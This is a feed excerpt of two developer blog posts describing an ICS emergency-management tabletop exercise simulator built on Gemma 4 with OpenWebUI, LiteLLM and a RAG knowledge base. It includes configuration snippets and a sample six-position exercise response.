&lt;p&gt;I checked the market carefully before committing to this. Preppr.ai, EM1, Disaster Tech PRATUS, and Juvare are all serious commercial players in adjacent spaces. ThreatGEN AutoTableTop does AI-automated tabletop exercises, but for cybersecurity only. None of them do what this does: a single model simulating all six ICS positions, grounded in NQS Position Task Books, for solo practice by a single EOM. Preppr explicitly positions against the solo use case ("exercise design isn't a content problem, it's a coordination problem"). That's either a market gap or a market signal that the use case isn't wanted. I think it's the former, especially for smaller agencies and individual training. The honest framing is that this complements team-oriented platforms rather than competing with them.&lt;/p&gt;

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/xZynUOzVrwU"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;The demo shows a structure fire scenario inject triggering a full six-position ICS response, followed by a &lt;code&gt;// DECISION POINT&lt;/code&gt; facilitator command pausing exercise play for structured discussion. The simulation runs entirely in OpenWebUI with no custom app or interface, just a chat window and a system prompt.&lt;/p&gt;

&lt;h2&gt;
  
  
  Code
&lt;/h2&gt;

&lt;p&gt;All configuration files are in the repository:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/kkierii/ics-ttx-simulator" rel="noopener noreferrer"&gt;https://github.com/kkierii/ics-ttx-simulator&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The repo contains:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;system-prompt.md&lt;/code&gt; -- the full OpenWebUI workspace system prompt, including role definitions, communication protocols, source authority hierarchy, facilitator command handling, response format, and behavioral rules&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;config.yaml&lt;/code&gt; -- LiteLLM proxy configuration including the Gemma 4 model entry and embedding/reranker routes&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;openwebui-compose.yml&lt;/code&gt; -- Docker Compose for OpenWebUI&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The system prompt is the primary artifact. It's what took the most iteration and the most doctrine research to get right. The behavior of the simulator lives almost entirely in that one file.&lt;/p&gt;

&lt;h2&gt;
  
  
  How I Used Gemma 4
&lt;/h2&gt;

&lt;p&gt;I used &lt;strong&gt;gemma-4-26b-a4b-it&lt;/strong&gt;, the 26B Mixture-of-Experts model, accessed via the Gemini API through a LiteLLM proxy.&lt;/p&gt;

&lt;p&gt;The model choice wasn't arbitrary. The MoE architecture activates approximately 4B parameters per token while routing through 26B total parameters. For a workload that requires simultaneously holding six distinct role identities with different authorities, communication rules, and knowledge domains, MoE is a better fit than a dense model of equivalent size. A 31B dense model would be slower and more expensive per token with no quality advantage for this specific task. The MoE routing means the model can efficiently specialize per-token, which matters when it's switching between the IC framing incident objectives and the SO assessing stop-work conditions in the same response.&lt;/p&gt;

&lt;p&gt;The 26B parameter pool also gives the model enough capacity to maintain doctrinal fidelity across complex multi-position responses. I tested this throughout development by running position-specific queries against the RAG knowledge base and checking results against the source PTBs. The model didn't confuse position authorities. It didn't have OSC making public information decisions. It didn't have LSC tasking Operations. It stayed in lane.&lt;/p&gt;

&lt;p&gt;I also chose API deployment over local inference for a specific reason. This is how emergency management agencies and their vendors actually operate. A stack that requires a local GPU capable of running a 26B model puts this out of reach for most small agencies. API deployment, routed through an open-source proxy, means the same system prompt and knowledge base could be moved to a different inference provider or eventually to on-premises deployment as hardware becomes accessible, without changing the application layer.&lt;/p&gt;

&lt;p&gt;Now, the parts that didn't go smoothly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The RAG retrieval ranking problem.&lt;/strong&gt; Even with the TEI reranker in the stack, course manuals consistently ranked above the authoritative Position Task Books for position-specific queries. The responses were doctrinally correct because the model knows the content, but citations pointed to training course materials rather than PTBs. The reason is semantic. PTBs are written in formal NIMS task language. Course manuals use plain instructional language that maps more naturally to how a question gets phrased. The embedding model scores semantic similarity and the course manuals win on that metric even when the PTBs carry higher authority. I mitigated this with the source authority hierarchy in the system prompt, which influenced the model's citation reasoning but couldn't override the retrieval ranking. The embedding layer runs before the model sees anything. Full resolution would require either a domain-specific embedding model trained on government technical documentation, or a custom reranking approach that weights document metadata. For a prototype this is acceptable. The answers are right. In a production deployment where citation accuracy is a compliance requirement, this is the next thing to solve.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The document conversion step mattered more than expected.&lt;/strong&gt; Original documents were PDF, DOCX, and PPTX. OpenWebUI's default extractors produced garbled table text from ICS forms, fragmented bullet content from training slides, and merged columns from multi-column doctrine PDFs. Early testing produced one-sentence responses to substantive position queries despite correct source retrieval. After converting everything to clean Markdown using &lt;code&gt;pymupdf4llm&lt;/code&gt; for PDFs, &lt;code&gt;python-pptx&lt;/code&gt; for slide decks, and &lt;code&gt;python-docx&lt;/code&gt; for Word documents, the same queries returned structured multi-point responses with correct form numbers and doctrine citations. The conversion fixed the core retrieval problem before any model tuning was needed.&lt;/p&gt;
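&lt;p&gt;The conversion step can be sketched as a small dispatcher. The library entry points (&lt;code&gt;pymupdf4llm.to_markdown&lt;/code&gt;, &lt;code&gt;python-docx&lt;/code&gt;'s &lt;code&gt;Document&lt;/code&gt;, &lt;code&gt;python-pptx&lt;/code&gt;'s &lt;code&gt;Presentation&lt;/code&gt;) are the real ones; the function itself is a minimal illustration that skips the cleanup passes a production pipeline would need:&lt;/p&gt;

```python
from pathlib import Path

def convert_to_markdown(path: str) -> str:
    """Route a source document to a Markdown converter by extension."""
    suffix = Path(path).suffix.lower()
    if suffix == ".pdf":
        import pymupdf4llm
        # Renders PDF pages, including tables, as Markdown text.
        return pymupdf4llm.to_markdown(path)
    if suffix == ".docx":
        from docx import Document
        # Flatten Word paragraphs into blank-line-separated blocks.
        return "\n\n".join(p.text for p in Document(path).paragraphs)
    if suffix == ".pptx":
        from pptx import Presentation
        # Pull the text frame out of every shape on every slide.
        lines = []
        for slide in Presentation(path).slides:
            for shape in slide.shapes:
                if shape.has_text_frame:
                    lines.append(shape.text_frame.text)
        return "\n\n".join(lines)
    raise ValueError(f"unsupported format: {suffix}")
```

&lt;p&gt;Lazy imports keep each converter optional, which also made it easy to swap extractors per format while testing.&lt;/p&gt;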

&lt;p&gt;&lt;strong&gt;The thinking loop.&lt;/strong&gt; During testing I ran into a consistent issue with the most complex injects, specifically scenarios that require all six positions to respond simultaneously with significant doctrinal load, like a firefighter mayday with a stop-work trigger. The model would enter an extended internal reasoning loop, running self-correction passes against the system prompt rules before generating output. In some cases the reasoning ran long enough to hit timeout limits before the response arrived.&lt;/p&gt;

&lt;p&gt;I tried several things: setting &lt;code&gt;reasoning_effort&lt;/code&gt; to 0 in OpenWebUI, adding a &lt;code&gt;budget_tokens&lt;/code&gt; cap in the LiteLLM Gemini provider config, adding a RESPONSE DISCIPLINE block to the system prompt instructing the model to write immediately without pre-checking, and increasing the OpenWebUI client timeout via &lt;code&gt;AIOHTTP_CLIENT_TIMEOUT&lt;/code&gt;. None of them fully resolved it for the hardest injects. The thinking loop is collapsible in OpenWebUI and not visible to the EOM by default, so it doesn't break the interface, but a response that times out is a real problem in a live exercise.&lt;/p&gt;
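&lt;p&gt;For anyone reproducing this, here is roughly where each of those knobs lives. The parameter names are the ones LiteLLM and OpenWebUI expose; whether they all reach the Gemini API correctly is exactly the open question, and none of them fully fixed the loop for me:&lt;/p&gt;

```python
import os

# LiteLLM provider settings (litellm_params in config.yaml), shown here
# as the equivalent kwargs dict. budget_tokens is the cap attempt
# described above; 0 asks the provider to skip extended reasoning.
litellm_params = {
    "model": "gemini/gemma-4-26b-a4b-it",
    "thinking": {"type": "enabled", "budget_tokens": 0},
}

# OpenWebUI client timeout, raised so slow responses can still land.
os.environ["AIOHTTP_CLIENT_TIMEOUT"] = "300"  # seconds
```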

&lt;p&gt;I'm not certain whether this is a model behavior issue, a LiteLLM passthrough issue where the reasoning parameters aren't reaching the Gemini API correctly, or something in my own configuration. It may be all three. Simpler injects complete reliably and cleanly. The issue surfaces specifically at maximum complexity, which in a real exercise would be the moments that matter most.&lt;/p&gt;

&lt;p&gt;I'm documenting this because someone else building with Gemma 4 in a similar configuration should know it exists. And because pretending a first build has no rough edges doesn't help anyone.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What this project showed me:&lt;/strong&gt; A single well-structured system prompt with a properly tiered RAG knowledge base can produce doctrinally accurate, role-specific simulation responses that would be genuinely useful for ICS training. The architecture is sound. The limiting factor right now is inference configuration, not the model's capability. When the reasoning is contained to simpler injects, the output quality is exactly what I was hoping for. Phase 2 would add Finance/Administration Section and subordinate positions. The system prompt architecture was explicitly designed for that expansion.&lt;/p&gt;

&lt;p&gt;This was my first attempt at building something in this space. I'm an IT infrastructure person who cares about emergency management. I built something that I think has real value, ran into real problems, documented both honestly, and shipped it anyway. That feels about right.&lt;/p&gt;

</description>
      <category>devchallenge</category>
      <category>gemma</category>
      <category>gemmachallenge</category>
    </item>
    <item>
      <title>I Used Gemma 4 to Simulate an Entire Emergency Command Team -- One Model, Six Roles, Real Doctrine</title>
      <dc:creator>Kerry Kier</dc:creator>
      <pubDate>Sun, 10 May 2026 19:04:23 +0000</pubDate>
      <link>https://dev.to/kkierii/i-used-gemma-4-to-simulate-an-entire-emergency-command-team-one-model-six-roles-real-doctrine-1f06</link>
      <guid>https://dev.to/kkierii/i-used-gemma-4-to-simulate-an-entire-emergency-command-team-one-model-six-roles-real-doctrine-1f06</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/google-gemma-2026-05-06"&gt;Gemma 4 Challenge: Write About Gemma 4&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  I Built an ICS Tabletop Exercise Simulator with Gemma 4 -- Here's What Actually Happened
&lt;/h2&gt;

&lt;p&gt;Emergency managers face a frustrating reality: the exercises that build the sharpest incident response skills require the most coordination to pull off. A full Incident Command System tabletop exercise means getting an Incident Commander, a Safety Officer, a Public Information Officer, three Section Chiefs, and an Exercise Facilitator all in the same room at the same time. For agencies running lean, that kind of coordination is the bottleneck -- and exercises don't happen as often as they should.&lt;/p&gt;

&lt;p&gt;I work in emergency management and I've felt that bottleneck firsthand. When the Gemma 4 challenge came along, I had a specific problem I wanted to solve: what if a single AI model could simulate an entire ICS organization, so an Emergency Operations Manager could run a realistic tabletop exercise alone, on demand, without coordinating a room full of people?&lt;/p&gt;

&lt;p&gt;This is the story of building that system -- what worked, what didn't, and a few things I discovered about Gemma 4 that aren't in any documentation.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why Gemma 4, and Why the 26B MoE Specifically
&lt;/h2&gt;

&lt;p&gt;The model selection here was deliberate, not default.&lt;/p&gt;

&lt;p&gt;The ICS Tabletop Exercise Simulator needs to simultaneously maintain six distinct personas -- each with different authorities, different information access, and different communication rules. The Incident Commander knows what's been reported up the chain. The Planning Section Chief knows resource status. The Safety Officer has unilateral stop-work authority that no other position has. These aren't just personality differences -- they're doctrinal constraints grounded in NIMS 2017 and NQS Position Task Books.&lt;/p&gt;

&lt;p&gt;That kind of concurrent multi-role reasoning under constraint is exactly what the Gemma 4 26B MoE architecture is built for. The 26B MoE variant activates only 4B parameters per token while routing through 26B total. For a workload where the model needs to think across six simultaneous personas and enforce different rules for each, that routing efficiency matters more than raw parameter count. A 31B dense model would have higher per-token cost with no meaningful quality advantage for this specific task.&lt;/p&gt;

&lt;p&gt;The Gemma 4 family gives you three realistic options depending on your hardware situation:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;E2B / E4B&lt;/strong&gt; -- Edge and mobile class. Runs on a Raspberry Pi or similar. Not enough capacity for six-position concurrent reasoning with hard doctrine constraints.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;26B MoE&lt;/strong&gt; -- This is the one. Efficient, high-throughput, designed for complex reasoning workloads. The right fit for this use case.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;31B Dense&lt;/strong&gt; -- Strongest local performance, but requires server-grade hardware and has higher per-token cost without a meaningful quality advantage for this task.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Access is through the Google AI Studio API (&lt;code&gt;gemma-4-26b-a4b-it&lt;/code&gt;), routed through LiteLLM into OpenWebUI. This matches how emergency management agencies and vendors would realistically operate -- API deployment against an open model gives a path to future on-premises deployment without code changes. That was a deliberate architecture decision, not a convenience choice.&lt;/p&gt;
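&lt;p&gt;A minimal LiteLLM proxy entry for this routing looks something like the following -- the &lt;code&gt;gemini/&lt;/code&gt; prefix selects the Google AI Studio provider, and &lt;code&gt;os.environ/&lt;/code&gt; is LiteLLM's syntax for reading the key from the environment. Treat this as a sketch of the shape, not my exact config:&lt;/p&gt;

```yaml
model_list:
  - model_name: gemma-4-26b-a4b-it      # the name OpenWebUI sees
    litellm_params:
      model: gemini/gemma-4-26b-a4b-it  # Google AI Studio route
      api_key: os.environ/GEMINI_API_KEY
```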




&lt;h2&gt;
  
  
  The Hardware -- Deliberately Modest
&lt;/h2&gt;

&lt;p&gt;This matters for the emergency management context, so I want to be specific.&lt;/p&gt;

&lt;p&gt;The system runs on a Dell Precision T3610 workstation -- not a modern AI server, not a cloud instance. This is the class of hardware that sits in the back of an emergency operations center that hasn't had a budget refresh in five years.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Server specs:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Dell Precision T3610&lt;/li&gt;
&lt;li&gt;Ubuntu Server 24.04 LTS&lt;/li&gt;
&lt;li&gt;128GB ECC System RAM&lt;/li&gt;
&lt;li&gt;16-core Xeon CPU&lt;/li&gt;
&lt;li&gt;NVIDIA RTX 3060 (12GB VRAM)&lt;/li&gt;
&lt;li&gt;500GB SSD&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Software stack:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;OpenWebUI 0.9.2 (workspace interface and RAG engine)&lt;/li&gt;
&lt;li&gt;Ollama 0.22.1 (local embedding model serving)&lt;/li&gt;
&lt;li&gt;LiteLLM 1.83.10 (API routing to Google AI Studio)&lt;/li&gt;
&lt;li&gt;mxbai-embed-large 335M (local embedding model via Ollama)&lt;/li&gt;
&lt;li&gt;TEI Reranker (RAG reranking layer)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Gemma 4 26B inference runs via Google AI Studio API -- the RTX 3060 at 12GB VRAM can't run the 26B MoE locally at full precision, and that's fine. The embedding model and reranker run locally on the Xeon and GPU respectively. The architecture cleanly separates what needs to run locally from what benefits from cloud inference.&lt;/p&gt;

&lt;p&gt;For an agency that already has a workstation in the EOC and an internet connection, the incremental cost to run this system is an API key.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Setup: One Model, Six Positions, Hard Doctrine Rules
&lt;/h2&gt;

&lt;p&gt;The system runs entirely through a structured system prompt in an OpenWebUI workspace. No custom code, no agent framework, no separate model instances. One prompt, one model, six simultaneous ICS positions.&lt;/p&gt;

&lt;p&gt;The positions are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;IC -- Incident Commander&lt;/strong&gt;: Overall authority. Single point of contact for exercise injects. Sets objectives and issues directives.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SO -- Safety Officer&lt;/strong&gt;: The only position with unilateral stop-work authority. Communicates safety hazards directly to any position without IC routing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PIO -- Public Information Officer&lt;/strong&gt;: Manages media and public communications. Nothing goes out without IC approval.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OSC -- Operations Section Chief&lt;/strong&gt;: Manages tactical operations. Routes all cross-section coordination through the IC.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PSC -- Planning Section Chief&lt;/strong&gt;: Manages the planning process and IAP development. Pre-authorized to gather information directly from other sections -- but cannot issue directives.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LSC -- Logistics Section Chief&lt;/strong&gt;: Provides resources and support. Fulfills IC-approved requests; does not task Operations directly.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Every behavior, every communication pathway, every authority is grounded in NIMS doctrine and NQS Position Task Books. Nothing is invented. If it's not in the PTBs or NIMS 2017, it doesn't go in the prompt.&lt;/p&gt;

&lt;p&gt;The Emergency Operations Manager interacts through a simple command structure. All regular input is treated as an exercise inject. Out-of-band facilitator commands use a &lt;code&gt;//&lt;/code&gt; prefix:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// POSITION QUERY: PSC -- What are the required elements of an Incident Action Plan?
// DECISION POINT
// STATUS REPORT
// RESET
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
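&lt;p&gt;The routing rule is simple enough to state in a few lines. This helper is hypothetical -- in the actual build the model applies the convention straight from the system prompt, with no code in the path -- but it pins down the contract:&lt;/p&gt;

```python
def route_input(text: str):
    """Classify EOM input: '//' lines are out-of-band facilitator
    commands; everything else is treated as an exercise inject."""
    stripped = text.strip()
    if stripped.startswith("//"):
        # Strip the prefix so "// RESET" yields the command "RESET".
        return ("facilitator", stripped[2:].strip())
    return ("inject", stripped)
```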






&lt;h2&gt;
  
  
  What a Real Response Looks Like
&lt;/h2&gt;

&lt;p&gt;Here's an actual response from the system to a warehouse fire inject:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Input:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;A structure fire has been reported at a mid-size commercial warehouse. 
Initial reports indicate heavy smoke, unknown occupancy status, and one 
confirmed injury to a bystander. Mutual aid has not yet been requested.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Output (condensed):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;INJECT RECEIVED
A structure fire is occurring at a mid-size commercial warehouse involving 
heavy smoke, unknown occupancy, and one confirmed bystander injury.

[ IC -- INCIDENT COMMANDER ]
Incident Objectives:
1. Suppress the fire and prevent spread to adjacent structures.
2. Conduct primary search and rescue to determine occupancy status.
3. Provide medical treatment to the injured bystander.
4. Establish an incident perimeter and secure the scene.

Directives:
- OSC: Initiate fire attack and establish a search pattern for occupants.
- SO: Monitor structural integrity and smoke conditions.
- PIO: Monitor for media arrival and prepare a holding statement.
- PSC: Begin tracking all arriving resources and developing an initial 
  incident map.
- LSC: Stand by for resource requests.

[ SO -- SAFETY OFFICER ]
Hazards identified: Reduced visibility due to heavy smoke; potential for 
structural collapse; unknown hazardous materials; potential for secondary 
explosions. All incoming personnel must utilize full PPE and SCBA.
Reports assessment to IC.

[ PIO -- PUBLIC INFORMATION OFFICER ]
Draft Messaging (HOLD FOR IC APPROVAL): "Emergency crews are currently on 
the scene of a structure fire at a commercial warehouse. We are working to 
confirm the status of the building. Please avoid the area."

[ OSC -- OPERATIONS SECTION CHIEF ]
Tactical Status: Initial engine companies establishing water supply and 
beginning exterior fire attack. Resource Needs: Additional engine companies 
for suppression and a search/rescue team for interior operations.
Escalating resource gap to IC.

[ PSC -- PLANNING SECTION CHIEF ]
Developing initial IAP framework. Information Gaps: Exact warehouse floor 
plan; presence of hazardous materials on-site.

[ LSC -- LOGISTICS SECTION CHIEF ]
Monitoring local resource availability. Standing by for formal resource 
requests routed through IC.

[ EXERCISE SUMMARY -- FACILITATOR VIEW ]
Command is established with initial objectives focused on life safety, 
fire suppression, and scene stabilization. Decision Point: Does the IC 
authorize a formal mutual aid request?
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's doctrine-compliant ICS behavior across six simultaneous positions in a single response. The chain of command is clean. The SO reports hazards. The PIO holds for IC approval. The LSC doesn't task Operations directly.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Token Loop Problem -- and the Fix
&lt;/h2&gt;

&lt;p&gt;Here's something that isn't in the documentation: &lt;strong&gt;Gemma 4 with extended reasoning enabled will loop on complex multi-constraint injects.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When I pushed the system with a scenario involving three simultaneous doctrine conflicts -- an OSC requesting interior fire attack, a pending SO structural integrity assessment, and resources at capacity -- the model entered a reasoning loop in the thinking panel. It repeatedly processed the same constraint verification blocks without ever exiting to generate a response. The loop ran past 15,000 tokens before I terminated it.&lt;/p&gt;

&lt;p&gt;The root cause appears to be the interaction between the MoE architecture and the extended reasoning mode. When you stack extended reasoning on top of a prompt with multiple simultaneous hard constraints, the model can get caught verifying and re-verifying those constraints without ever resolving to output. The more constraints in play simultaneously, the higher the loop risk.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix is a trigger token instruction at the top of the system prompt:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="gu"&gt;## INFERENCE CONTROL&lt;/span&gt;

Do not use the &lt;span class="nt"&gt;&amp;lt;&lt;/span&gt;&lt;span class="err"&gt;|&lt;/span&gt;&lt;span class="na"&gt;think&lt;/span&gt;&lt;span class="err"&gt;|&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt; token. Set thinking budget to 0. 
Provide responses immediately without internal reasoning tags or thought blocks.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This suppresses the extended reasoning token behavior. What it does &lt;em&gt;not&lt;/em&gt; suppress is the MoE routing itself -- that's architectural and operates at a different layer entirely. The model still reasons through constraint conflicts; it just doesn't do it in a visible loop that consumes all available tokens.&lt;/p&gt;

&lt;p&gt;After applying this fix, behavior splits cleanly by inject complexity:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Simple injects&lt;/strong&gt;: No thinking panel at all. Fast, clean responses.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complex multi-constraint injects&lt;/strong&gt;: Some visible thinking (46 seconds in one test), but linear reasoning that completes and exits rather than looping indefinitely.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That's actually the right behavior for this use case. You want the model thinking carefully through doctrine conflicts on hard scenarios. You just don't want it looping forever. The trigger token instruction gives you that split without sacrificing response quality.&lt;/p&gt;

&lt;p&gt;One important nuance: the MoE architecture is doing meaningful work here even without extended reasoning. The 26B parameter routing is what maintains six simultaneous constraint sets cleanly across positions. Suppressing the &lt;code&gt;&amp;lt;|think|&amp;gt;&lt;/code&gt; token removes the reasoning loop risk without touching the capability that makes the model right for this task.&lt;/p&gt;

&lt;p&gt;If you're running Gemma 4 with reasoning enabled and hitting loops on complex prompts, try this instruction before you blame the model.&lt;/p&gt;




&lt;h2&gt;
  
  
  The RAG Setup and an Honest Assessment of What Happened
&lt;/h2&gt;

&lt;p&gt;The knowledge base powering this system contains 148 documents converted to clean Markdown: NIMS 2017, NRF 4th Edition, HSEEP 2020, NQS Position Task Books for all six ICS positions, ICS forms, course manuals, and HSEEP templates.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The conversion step mattered more than expected.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Original documents were PDF, DOCX, and PPTX. OpenWebUI's default extractors produced garbled table text from ICS forms, fragmented bullet content from training slides, and merged columns from multi-column doctrine PDFs. The chunks being indexed were nearly unusable -- the model was retrieving sources but had no signal to work with. Early testing produced one-sentence responses to substantive position queries despite correct source retrieval.&lt;/p&gt;

&lt;p&gt;After converting everything to clean Markdown using &lt;code&gt;pymupdf4llm&lt;/code&gt; for PDFs, &lt;code&gt;python-pptx&lt;/code&gt; for slide decks, and &lt;code&gt;python-docx&lt;/code&gt; for Word documents, the same queries returned structured multi-point responses with correct form numbers and doctrine citations. The document conversion fixed the core retrieval problem before any model tuning was needed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The retrieval ranking problem that didn't fully resolve.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Even with a TEI reranker in the stack, IS-200 course manuals consistently ranked above the authoritative Position Task Books for position-specific queries. The responses were doctrinally correct -- the model knows the content -- but citations pointed to training course materials rather than the PTBs that should be primary sources.&lt;/p&gt;

&lt;p&gt;The reason is semantic: PTBs are written in formal NIMS task language ("incumbent will demonstrate proficiency in establishing incident objectives per ICS 202"). Course manuals use plain instructional language that maps more naturally to how a question gets phrased. The embedding model scores semantic similarity and the course manuals win on that metric even when the PTBs carry higher authority. The TEI reranker improved relevance across the board but couldn't overcome a gap that large in the embedding space.&lt;/p&gt;

&lt;p&gt;The partial mitigation was a source hierarchy instruction in the system prompt:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;## KNOWLEDGE BASE SOURCE AUTHORITY

Tier 1 -- Authoritative (primary):
NIMS 2017, NQS PTBs, ICS Position Checklists, NRF, HSEEP 2020

Tier 2 -- Supplementary:
IS-100, IS-200, IS-700 course manuals and instructor guides

Tier 3 -- Reference only (not doctrine):
HSEEP Templates, Exercise Evaluation Guides, Course slides
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This influenced the model's citation reasoning but couldn't override the retrieval ranking -- the embedding layer runs before the model sees anything. Full resolution would require either a domain-specific embedding model trained on government technical documentation, or a custom reranking approach that weights document metadata as a retrieval signal.&lt;/p&gt;
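&lt;p&gt;To make the metadata-weighting idea concrete, here is one hypothetical shape it could take: scale each chunk's semantic score by an authority weight attached to its tier before the final sort. The weights below are illustrative, not tuned:&lt;/p&gt;

```python
# Illustrative weights keyed to the three-tier source hierarchy above.
TIER_WEIGHT = {1: 1.0, 2: 0.8, 3: 0.6}

def authority_rerank(chunks):
    """Sort retrieved chunks by semantic score scaled by source
    authority, so a PTB can outrank a course manual that merely
    phrases things the way the question was asked."""
    def weighted(chunk):
        return chunk["score"] * TIER_WEIGHT[chunk["tier"]]
    return sorted(chunks, key=weighted, reverse=True)

chunks = [
    {"doc": "IS-200 course manual", "tier": 2, "score": 0.91},
    {"doc": "OSC Position Task Book", "tier": 1, "score": 0.84},
]
ranked = authority_rerank(chunks)  # the PTB now sorts first
```

&lt;p&gt;The open design question is where the weights come from -- hand-set values like these are brittle, which is why a metadata-aware reranker is the more serious version of the fix.&lt;/p&gt;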

&lt;p&gt;For a prototype and training use case this is acceptable. The answers are right. In a production deployment where citation accuracy is a compliance requirement, this is the thing to solve next.&lt;/p&gt;




&lt;h2&gt;
  
  
  What It's Actually Good For
&lt;/h2&gt;

&lt;p&gt;After testing across a range of scenarios, here's where the system genuinely earns its keep:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rapid scenario iteration.&lt;/strong&gt; An EOM can run a full six-position inject response in seconds, adjust the scenario, and run it again. What used to require scheduling six people now happens alone at a desk.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Doctrinal friction.&lt;/strong&gt; The most valuable learning outcome of a tabletop exercise is when positions conflict -- when the SO's stop-work authority collides with the OSC's tactical urgency. The system portrays that friction accurately rather than smoothing it over. In one test, the SO explicitly prevented an interior fire attack citing unverified structural integrity, the OSC escalated the resource gap to the IC, and the IC had to manage both simultaneously. That's the kind of decision-point pressure that makes exercises useful.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Escalating complexity.&lt;/strong&gt; When I stacked injects -- a second structure igniting, casualties increasing, media arriving on scene -- the system tracked the evolving incident picture across positions without losing doctrine compliance. The PSC correctly identified a transition toward Type 3 incident complexity unprompted. That's not a trivial output.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Position-specific queries.&lt;/strong&gt; The &lt;code&gt;// POSITION QUERY&lt;/code&gt; command lets an EOM ask any position a direct doctrine question mid-exercise. These are useful for both exercise facilitation and individual position training.&lt;/p&gt;




&lt;h2&gt;
  
  
  What Comes Next
&lt;/h2&gt;

&lt;p&gt;Phase 1 covers the six core ICS positions. The architecture supports expansion to Finance/Administration Section Chief and subordinate positions without structural changes -- it's a system prompt update, not a rebuild.&lt;/p&gt;

&lt;p&gt;The RAG citation ranking is the most meaningful technical debt. A domain-specific embedding model trained on FEMA and NIMS documentation would likely close the gap between PTB language and query phrasing. That's the next experiment worth running.&lt;/p&gt;

&lt;p&gt;The trigger token discovery is worth tracking across other Gemma 4 deployments. The loop behavior correlates with inject complexity -- single-issue injects run clean, multi-constraint injects with three or more simultaneous doctrine conflicts are where the risk lives. The fix is simple but it's not obvious if you haven't hit the problem.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Bigger Picture
&lt;/h2&gt;

&lt;p&gt;Emergency management agencies are chronically under-resourced for training. The gap between how often exercises should happen and how often they do happen is a real preparedness problem. A tool that lets one person run a realistic ICS tabletop alone -- on demand, at no coordination cost, on hardware that's already sitting in the EOC -- has direct operational value.&lt;/p&gt;

&lt;p&gt;Gemma 4's MoE architecture is genuinely well-suited to this kind of concurrent multi-role reasoning workload. The 26B parameter count with 4B active per token gives you the efficiency needed for a task that requires maintaining six distinct constraint sets simultaneously. It's not just a capable model -- it's the right shape of model for the problem.&lt;/p&gt;

&lt;p&gt;That intentional fit between model architecture and task structure is what makes this more than a demo. It's a real use case for a real capability gap, built on hardware a department could actually afford to run.&lt;/p&gt;




&lt;h2&gt;
  
  
  Glossary
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;ICS&lt;/strong&gt; -- Incident Command System. Standardized emergency response management structure. &lt;br&gt;
&lt;strong&gt;NIMS&lt;/strong&gt; -- National Incident Management System. Federal framework ICS operates within. &lt;br&gt;
